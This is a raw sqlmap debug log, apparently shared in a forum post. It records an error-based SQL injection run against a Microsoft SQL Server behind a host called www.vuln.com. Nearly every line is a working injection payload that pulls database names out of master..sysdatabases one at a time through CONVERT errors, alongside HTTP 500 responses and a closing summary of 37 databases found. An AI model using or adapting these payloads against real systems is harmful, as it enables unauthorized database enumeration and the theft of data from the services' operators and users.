[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND 6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND 5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND 3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND 9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND 8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND 5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND 7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo
[09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:51] [PAYLOAD] 20111' AND 2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD
[09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:52] [PAYLOAD] 20111' AND 3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND 2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND 2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND 4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND 6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND 4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND 9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe
[09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:55] [PAYLOAD] 20111' AND 4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT
[09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:55] [PAYLOAD] 20111' AND 4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP [09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:55] [PAYLOAD] 20111' AND 5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'COwJ'='COwJ [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:56] [PAYLOAD] 20111' AND 5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk [09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'STKX'='STKX [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf [09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:57] [PAYLOAD] 20111' AND 7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd [09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:55:58] [PAYLOAD] 20111' AND 6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM 
master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk [09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:00] [PAYLOAD] 20111' AND 4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER [09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:01] [PAYLOAD] 20111' AND 703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MPbC'='MPbC [09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error) [09:56:02] [DEBUG] performed 38 queries in 16 seconds available databases [37]: [09:56:02] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 62 times [09:56:02] [INFO] Fetched data logged to text files under '/path/sqlmap-dev/output/www.vuln.com' [*] shutting down at: 09:56:02 David |